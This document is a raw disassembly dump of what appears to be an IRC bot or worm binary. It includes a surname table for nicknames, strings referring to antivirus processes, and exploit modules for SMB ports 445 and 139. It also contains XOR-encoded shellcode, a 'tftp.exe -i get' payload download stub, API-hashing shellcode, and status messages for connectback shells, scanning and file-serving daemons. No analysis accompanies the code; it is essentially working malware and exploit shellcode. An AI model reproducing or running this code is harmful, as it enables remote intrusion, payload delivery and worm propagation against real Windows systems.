dd offset aTringali ; "Tringali"
dd offset aTroiani ; "Troiani"
dd offset aTroy ; "Troy"
dd offset aTruss ; "Truss"
dd offset aTsiatis ; "Tsiatis"
dd offset aTsomides ; "Tsomides"
dd offset aTsukurov ; "Tsukurov"
dd offset aTuck ; "Tuck"
dd offset aTudge ; "Tudge"
dd offset aTukan ; "Tukan"
dd offset aTurano ; "Turano"
dd offset aTurek ; "Turek"
dd offset aTuttle ; "Tuttle"
dd offset aTwells ; "Twells"
dd offset aTzamarias ; "Tzamarias"
dd offset aUllman ; "Ullman"
dd offset aUntermeyer ; "Untermeyer"
dd offset aUpsdell ; "Upsdell"
dd offset aUrban ; "Urban"
dd offset aUrdangBrown ; "Urdang-Brown"
dd offset aUsdan ; "Usdan"
dd offset aUzuner ; "Uzuner"
dd offset aVacca ; "Vacca"
dd offset aWaite ; "Waite"
dd offset aValberg ; "Valberg"
dd offset aValencia ; "Valencia"
dd offset aWales ; "Wales"
dd offset aWallenberg ; "Wallenberg"
dd offset aWalter ; "Walter"
dd offset aVanallen ; "vanAllen"
dd offset aVanzwet ; "VanZwet"
dd offset aVandenberg ; "Vandenberg"
dd offset aVanheeckeren ; "Vanheeckeren"
dd offset aWarshafsky ; "Warshafsky"
dd offset aWasowska ; "Wasowska"
dd offset aVasquez ; "Vasquez"
dd offset aWaugh ; "Waugh"
dd offset aWeighart ; "Weighart"
dd offset aWeingarten ; "Weingarten"
dd offset aWeinhaus ; "Weinhaus"
dd offset aWeissbourd ; "Weissbourd"
dd offset aWeissman ; "Weissman"
dd offset aVelasquez ; "Velasquez"
dd offset aWelles ; "Welles"
dd offset aWelsh ; "Welsh"
dd offset aWengret ; "Wengret"
dd offset aVenne ; "Venne"
dd offset aVerghese ; "Verghese"
dd offset aWescott ; "Wescott"
dd offset aWetzel ; "Wetzel"
dd offset aWhately ; "Whately"
dd offset aWhilton ; "Whilton"
dd offset aWhite ; "White"
dd offset aWhitla ; "Whitla"
dd offset aWhittaker ; "Whittaker"
dd offset aViana ; "Viana"
dd offset aViano ; "Viano"
dd offset aWiedersheim ; "Wiedersheim"
dd offset aWiener ; "Wiener"
dd offset aViens ; "Viens"
dd offset aVignola ; "Vignola"
dd offset aWilder ; "Wilder"
dd offset aWilhelm ; "Wilhelm"
dd offset aWilk ; "Wilk"
dd offset aWilkin ; "Wilkin"
dd offset aWilkinson ; "Wilkinson"
dd offset aVillarreal ; "Villarreal"
dd offset aWillstatter ; "Willstatter"
dd offset aWilson ; "Wilson"
dd offset aVitali ; "Vitali"
dd offset aViviani ; "Viviani"
dd offset aVoigt ; "Voigt"
dd offset aWolk ; "Wolk"
dd offset aVonhoffman ; "VonHoffman"
dd offset aWoo ; "Woo"
dd offset aWooden ; "Wooden"
dd offset aWoods ; "Woods"
dd offset aWoodsPowell ; "Woods-Powell"
dd offset aVorhaus ; "Vorhaus"
dd offset aVotey ; "Votey"
dd offset aYacono ; "Yacono"
dd offset aYamane ; "Yamane"
dd offset aYankee ; "Yankee"
dd offset aYarchuk ; "Yarchuk"
dd offset aYates ; "Yates"
dd offset aYbarra ; "Ybarra"
dd offset aYedidia ; "Yedidia"
dd offset aYesson ; "Yesson"
dd offset aYetiv ; "Yetiv"
dd offset aYoffe ; "Yoffe"
dd offset aYoo ; "Yoo"
dd offset aYoukSee ; "Youk-See"
dd offset aYu ; "Yu"
dd offset aZachary ; "Zachary"
dd offset aZahedi ; "Zahedi"
dd offset aZangwill ; "Zangwill"
dd offset aZegans ; "Zegans"
dd offset aZerbini ; "Zerbini"
dd offset aZoldak ; "Zoldak"
dd offset aZucconi ; "Zucconi"
dd offset aZurn ; "Zurn"
dd offset aZwiers ; "Zwiers"
dd offset aZytowski ; "Zytowski"
dword_447FEC dd 7325h ; DATA XREF: sub_40AFAB+27�o
dword_447FF0 dd 69257325h, 0 ; DATA XREF: sub_40AFAB+4E�o
dword_447FF8 dd 7325h ; DATA XREF: _0:0040B030�o
dword_447FFC dd 69257325h, 0 ; DATA XREF: _0:0040B057�o
dword_448004 dd 4350h ; DATA XREF: _0:0040B0C8�o
dword_448008 dd 4350h ; DATA XREF: _0:0040B0F2�o
dword_44800C dd 4350h ; DATA XREF: _0:0040B11E�o
dword_448010 dd 69257325h, 0 ; DATA XREF: _0:0040B149�o
dword_448018 dd 7C7325h ; DATA XREF: _0:0040B197�o
dword_44801C dd 69257325h, 0 ; DATA XREF: _0:0040B1BE�o
dword_448024 dd 3539h ; DATA XREF: _0:0040B22C�o
dword_448028 dd 544Eh ; DATA XREF: _0:0040B23A�o
dword_44802C dd 3839h ; DATA XREF: _0:0040B24A�o
dword_448030 dd 454Dh ; DATA XREF: _0:0040B25A�o
dword_448034 dd 4B32h ; DATA XREF: _0:0040B273�o
dword_448038 dd 5058h ; DATA XREF: _0:0040B283�o
dword_44803C dd 334B32h ; DATA XREF: _0:0040B291�o
dword_448040 dd 3F3F3Fh ; DATA XREF: _0:loc_40B298�o
dword_448044 dd 5D73255Bh, 7Ch ; DATA XREF: _0:0040B2A1�o
dword_44804C dd 69257325h, 0 ; DATA XREF: _0:0040B2C8�o
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40B2E7+1F�o
align 4
aM_0 db '[M]',0 ; DATA XREF: sub_40B2E7+2C�o
aDS db '[%d]%s',0 ; DATA XREF: sub_40B2E7+3A�o
align 4
aMirc_1 db 'mIRC',0 ; DATA XREF: sub_40B2E7:loc_40B336�o
align 10h
aM_1 db '[M]',0 ; DATA XREF: sub_40B2E7+5C�o
align 8
loc_448078: ; DATA XREF: sub_40B590+BE�o
jmp short loc_44807C
; ---------------------------------------------------------------------------
loc_44807A: ; CODE XREF: _2:loc_44807C�p
jmp short loc_448081
; ---------------------------------------------------------------------------
loc_44807C: ; CODE XREF: _2:loc_448078�j
call loc_44807A
loc_448081: ; CODE XREF: _2:loc_44807A�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_448086 dw 0FFFFh ; DATA XREF: sub_40B590+C6�w
db 80h, 73h, 0Eh
byte_44808B db 0FFh ; DATA XREF: sub_40B590+CD�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_448090: ; DATA XREF: sub_40B590+9C�o
jmp short loc_448094
; ---------------------------------------------------------------------------
loc_448092: ; CODE XREF: _2:loc_448094�p
jmp short loc_448099
; ---------------------------------------------------------------------------
loc_448094: ; CODE XREF: _2:loc_448090�j
call loc_448092
loc_448099: ; CODE XREF: _2:loc_448092�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_44809D db 0FFh ; DATA XREF: sub_40B590+A4�w
dw 7380h
db 0Ch
byte_4480A1 db 0FFh ; DATA XREF: sub_40B590+AA�w
dw 0E243h
dd 0F9h
dword_4480A8 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40B419+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_44810C dd 12h ; DATA XREF: sub_40B419+3D�w
aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_40B419+79�o
aJ_0 db 'j',0
db 0E8h
dword_448125 dd 17h ; DATA XREF: sub_40B419+4D�w
; ---------------------------------------------------------------------------
jnz short near ptr byte_44812C
retn
; ---------------------------------------------------------------------------
byte_44812C db 0E8h ; CODE XREF: _2:00448129�j
dword_44812D dd 1 ; DATA XREF: sub_40B419+45�w
byte_448131 db 0, 6Ah, 0 ; DATA XREF: sub_40B419+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_44813B dd 0FFFFFFEDh ; DATA XREF: sub_40B419+5D�w
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi ; MultiByteToWideChar
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 4
dword_44816C dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h
; DATA XREF: sub_40B74E+10�o
dword_448180 dd 202E6425h, 7325h ; DATA XREF: sub_40B74E+46�o
aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40B919+35�o
align 10h
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40B919+51�o
align 4
aSym db 'sym',0 ; DATA XREF: sub_40BE20+4F�o
; sub_40C87D+155�o
dd 0
db 2 dup(0)
aSymantec db 'Symantec',0 ; DATA XREF: sub_40BD5A+30�o
align 4
dd 5 dup(0)
dword_4481F0 dd 0B97h ; DATA XREF: sub_401C87+1D4D�r
; sub_401C87+1D76�o ...
off_4481F4 dd offset sub_40E9ED ; DATA XREF: sub_40C87D+1D7�r
dword_4481F8 dd 0 ; DATA XREF: sub_40BBCD+2E�o
; _0:0040DBB7�r ...
dword_4481FC dd 1 ; DATA XREF: sub_40C049+1F�r
dword_448200 dd 1 ; DATA XREF: sub_40C049+3AA�r
dword_448204 dd 0 ; DATA XREF: sub_40C049+285�r
dd 636E76h, 0
dd 6E760000h, 63h, 6 dup(0)
dd 170Ch, 40EB1Fh, 0
dd 2 dup(1), 0
aNet445 db 'net445',0
align 10h
dd 654E0000h, 69706174h, 353434h, 5 dup(0)
dd 1BDh, 40E882h, 0
dd 2 dup(1), 0
aAsn445 db 'asn445',0
align 10h
dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0)
dd 1BDh, 40DA19h, 0
dd 2 dup(1), 0
aAsn139 db 'asn139',0
align 10h
dd 53410000h, 2D312E4Eh, 20424D53h, 544Eh, 4 dup(0)
dd 8Bh, 40DA19h, 0
dd 2 dup(1), 2 dup(0)
dd 10100h, 0Eh dup(0)
aAsn139_0 db 'asn139',0
align 10h
db 2 dup(0)
byte_448352 db 1 ; DATA XREF: sub_401C87:loc_40394D�r
; sub_401C87+1CD0�o
aNet445_0 db 'net445',0
align 4
dd 73610100h, 3534346Eh, 0
dd 1, 3 dup(0)
; ---------------------------------------------------------------------------
jmp short loc_44838A
; =============== S U B R O U T I N E =======================================
sub_44837A proc near ; CODE XREF: sub_44837A:loc_44838A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_448382: ; CODE XREF: sub_44837A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_448382
jmp short loc_44838F
; ---------------------------------------------------------------------------
loc_44838A: ; CODE XREF: _2:00448378�j
call sub_44837A
loc_44838F: ; CODE XREF: sub_44837A+E�j
jo short near ptr dword_44830C+1Eh
cwde
cdq
cdq
retn
sub_44837A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
unk_4484F8 db 2Dh ; - ; DATA XREF: sub_40BBCD+11�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aExploitStatist db 'Exploit Statistics:',0
dword_448518 dd 25370320h, 203A0373h, 2C6425h ; DATA XREF: sub_40BBCD+46�o
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40BBCD+85�o
align 4
unk_448538 db 2Dh ; - ; DATA XREF: sub_40BC9B+37�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
db 54h ; T
db 72h, 61h, 6Eh
db 73h ; s
db 66h, 65h, 72h
db 20h
db 53h, 74h, 61h
db 74h ; t
db 69h, 73h, 74h
db 69h ; i
db 63h, 73h, 3Ah
db 20h
db 2, 54h, 46h
db 54h ; T
db 50h, 2, 3Ah
db 20h
db 25h, 64h, 2Ch
db 20h
db 2, 46h, 54h
db 50h ; P
db 2, 3Ah, 20h
aDTotalDInS_ db '%d, Total %d in %s.',0
unk_448580 db 2Dh ; - ; DATA XREF: sub_40BD06+21�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aDConnectbackSh db '%d connectback shells in %s.',0
align 4
dword_4485AC dd 234032Dh, 6E616373h, 202D0302h, 6C707845h, 2074696Fh
; DATA XREF: sub_40BD5A+14�o
dd 7473694Ch, 3Ah
dword_4485C8 dd 25370320h, 28200373h, 73253403h, 2C2903h ; DATA XREF: sub_40BD5A+40�o
aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40BD5A+7E�o
unk_4485E8 db 2Dh ; - ; DATA XREF: sub_40BE20+80�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
db 2Dh, 20h, 74h
db 72h ; r
db 79h, 69h, 6Eh
db 67h ; g
db 20h, 2, 25h
db 73h ; s
db 2, 20h, 6Fh
aNSPortD___ db 'n %s (port %d)...',0
align 4
unk_448618 db 2Dh ; - ; DATA XREF: sub_40BE20+16F�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFinishedExploi db '- finished exploiting %s (%d attempts)',0
unk_44864C db 2Dh ; - ; DATA XREF: sub_40BFD2+2C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aCurrentIpS_ db 'Current IP: %s.',0
unk_448668 db 2Dh ; - ; DATA XREF: sub_40BFD2+42�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanNotActive_ db 'Scan not active.',0
align 4
unk_448688 db 2Dh ; - ; DATA XREF: sub_40C049+D7�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_2 db ' Server started on Port: %d, File: %s.',0
align 4
unk_4486BC db 2Dh ; - ; DATA XREF: sub_40C049+137�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_35 db ' Failed to start server, error: <%d>.',0
align 10h
unk_4486F0 db 2Dh ; - ; DATA XREF: sub_40C049+1FF�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aServerStarte_3 db 'Server started on Port: %d, File: %s.',0
align 4
unk_448724 db 2Dh ; - ; DATA XREF: sub_40C049+25F�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_36 db 'Failed to start server, error: <%d>.',0
align 4
unk_448758 db 2Dh ; - ; DATA XREF: sub_40C049+326�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aServerStarte_4 db '- Server started on Port: %d.',0
align 4
unk_448788 db 2Dh ; - ; DATA XREF: sub_40C049+386�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aFailedToSta_37 db '- Failed to start server, error: <%d>.',0
unk_4487C0 db 2Dh ; - ; DATA XREF: sub_40C049+440�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_1 db ' Server listening on IP: %s:%d, Directory: %s\.',0
unk_4487FC db 2Dh ; - ; DATA XREF: sub_40C049+4C5�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_38 db ' Failed to start server, error: <%d>.',0
align 10h
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_40C575+38�o
aSocketOpenFail db 'socket open failed',0 ; DATA XREF: _0:0040C7A3�o
align 10h
aSendtoSocketFa db 'sendto() socket failed. sent = %d <%d>.',0 ; DATA XREF: _0:0040C7DA�o
aSocketOpen_ db 'Socket open.',0 ; DATA XREF: _0:0040C847�o
align 4
aRecvfromSocket db 'recvfrom() socket failed',0 ; DATA XREF: _0:loc_40C857�o
align 4
aSocketClosed_ db 'Socket closed.',0 ; DATA XREF: _0:loc_40C86B�o
align 4
unk_4488B4 db 2Dh ; - ; DATA XREF: sub_40C87D+84�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSDScanThread db 'IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
unk_4488EC db 2Dh ; - ; DATA XREF: sub_40C87D+DC�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOpen db 'IP: %s, Port %d is open.',0
align 4
unk_448914 db 2Dh ; - ; DATA XREF: sub_40CA91+87�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToInitia db 'Failed to initialize critical section.',0
align 4
unk_448948 db 2Dh ; - ; DATA XREF: sub_40CA91+103�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0
unk_44897C db 2Dh ; - ; DATA XREF: sub_40CA91+168�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
unk_4489B4 db 2Dh ; - ; DATA XREF: sub_40CA91+1E0�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
align 4
unk_4489F4 db 2Dh ; - ; DATA XREF: sub_40CCE8+92�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOp_0 db 'IP: %s Port: %d is open.',0
align 4
unk_448A1C db 2Dh ; - ; DATA XREF: sub_40CDB5+41�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0
align 4
unk_448A44 db 2Dh ; - ; DATA XREF: sub_40CEA6+41�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0
align 10h
unk_448A70 db 2Dh ; - ; DATA XREF: sub_40CEA6+D1�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedScanni db 'Finished scanning IP: %s.',0
align 10h
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40D24D+B2�o
align 4
dword_448AAC dd 10FF8h, 0 ; DATA XREF: sub_40D24D+6A�o
dword_448AB4 dd 10FF8h ; DATA XREF: sub_40D24D+79�o
dword_448AB8 dd 7FFDF020h, 0 ; DATA XREF: sub_40D24D+162�o
dword_448AC0 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40D667+78�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_448B48 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40D667+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_448B78 dd 0 ; DATA XREF: sub_40D667+44�o
dd 800000D4h, 2 dup(0)
unk_448B88 db 81h ; ; DATA XREF: sub_40D746+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 2 dup(0)
byte_448BD8 db 41h ; DATA XREF: sub_40D7E4+FF�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
; =============== S U B R O U T I N E =======================================
sub_448C20 proc near ; DATA XREF: _0:0040DA9B�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_448D1C
push dword ptr [esi]
push 63D61209h
call sub_448D32
mov [esi+8], eax
call sub_448CE5
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_448D32
mov [esi+0Ch], eax
call sub_448C97
push dword ptr [esi+4]
push 4C0297FAh
call sub_448D32
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_448C20 endp
; =============== S U B R O U T I N E =======================================
sub_448C97 proc near ; CODE XREF: sub_448C20+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_448CC0
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_448C97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_448CC0 proc near ; CODE XREF: sub_448C97+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_448CCF: ; CODE XREF: sub_448CC0+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_448CDC
inc ebx
jmp short loc_448CCF
; ---------------------------------------------------------------------------
loc_448CDC: ; CODE XREF: sub_448CC0+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_448CC0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_448CE5 proc near ; CODE XREF: sub_448C20+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_448CFD: ; CODE XREF: sub_448CE5+1E�j
cmp [ecx], ebx
jz short loc_448D05
mov ecx, [ecx]
jmp short loc_448CFD
; ---------------------------------------------------------------------------
loc_448D05: ; CODE XREF: sub_448CE5+1A�j
mov edx, edi
loc_448D07: ; CODE XREF: sub_448CE5+2A�j
cmp [edx+4], ebx
jz short loc_448D11
mov edx, [edx+4]
jmp short loc_448D07
; ---------------------------------------------------------------------------
loc_448D11: ; CODE XREF: sub_448CE5+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_448CE5 endp
; =============== S U B R O U T I N E =======================================
sub_448D1C proc near ; CODE XREF: sub_448C20+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_448D1C endp
; =============== S U B R O U T I N E =======================================
sub_448D32 proc near ; CODE XREF: sub_448C20+16�p
; sub_448C20+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_448D48: ; CODE XREF: sub_448D32+33�j
jecxz short loc_448D82
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_448D55: ; CODE XREF: sub_448D32+2D�j
lodsb
cmp al, ah
jz short loc_448D61
ror edi, 0Dh
add edi, eax
jmp short loc_448D55
; ---------------------------------------------------------------------------
loc_448D61: ; CODE XREF: sub_448D32+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_448D48
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_448D82: ; CODE XREF: sub_448D32:loc_448D48�j
; sub_448D32:loc_448D82�j
jmp short loc_448D82
sub_448D32 endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
sub_448D88 proc near ; DATA XREF: _0:0040DA49�o
arg_0 = dword ptr 4
add esp, 0FFFFF254h
cld
call sub_448DDA
mov eax, [ebp+3Ch]
mov edi, [ebp+eax+78h]
add edi, ebp
mov ecx, [edi+18h]
mov ebx, [edi+20h]
add ebx, ebp
loc_448DA5: ; CODE XREF: sub_448D88+38�j
jecxz short loc_448DD5
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor eax, eax
cdq
loc_448DB0: ; CODE XREF: sub_448D88+32�j
lodsb
test al, al
jz short loc_448DBC
ror edx, 0Dh
add edx, eax
jmp short loc_448DB0
; ---------------------------------------------------------------------------
loc_448DBC: ; CODE XREF: sub_448D88+2B�j
cmp edx, [esp+arg_0]
jnz short loc_448DA5
mov ebx, [edi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edi+1Ch]
add ebx, ebp
mov ebx, [ebx+ecx*4]
add ebx, ebp
loc_448DD5: ; CODE XREF: sub_448D88:loc_448DA5�j
mov [esp+arg_0], ebx
retn
sub_448D88 endp
; =============== S U B R O U T I N E =======================================
sub_448DDA proc near ; CODE XREF: sub_448D88+7�p
; FUNCTION CHUNK AT 00448E12 SIZE 00000007 BYTES
xor eax, eax
mov eax, fs:[eax+30h]
test eax, eax
js short loc_448DF3
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp loc_448DFE
; ---------------------------------------------------------------------------
loc_448DF3: ; CODE XREF: sub_448DDA+8�j
mov eax, [eax+34h]
add eax, 7Ch
mov ebp, [eax+3Ch]
loc_448DFE: ; CODE XREF: sub_448DDA+14�j
pop edi
xor esi, esi
pusha
push esi
jmp short loc_448E12
sub_448DDA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_448E05 proc near ; CODE XREF: sub_448DDA:loc_448E12�p
push 60E0CEEFh
push 0E8AFE98h
push edi
jmp edi
sub_448E05 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448DDA
loc_448E12: ; CODE XREF: sub_448DDA+29�j
call sub_448E05
loc_448E17: ; DATA XREF: sub_40D1F2+1B�o
add [ebx], ah
; END OF FUNCTION CHUNK FOR sub_448DDA
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_448E1C: ; DATA XREF: sub_40D24D+E8�o
jmp short near ptr dword_448E24
; ---------------------------------------------------------------------------
db 6 dup(90h)
dword_448E24 dd 0 ; CODE XREF: _2:loc_448E1C�j
aCccc db 'CCCC',0 ; DATA XREF: sub_40D24D+153�o
align 10h
dword_448E30 dd 3 ; DATA XREF: sub_40D24D+246�o
byte_448E34 db 0A1h, 0 ; DATA XREF: sub_40D24D+29F�o
word_448E36 dw 30h ; DATA XREF: sub_40D24D+2CA�o
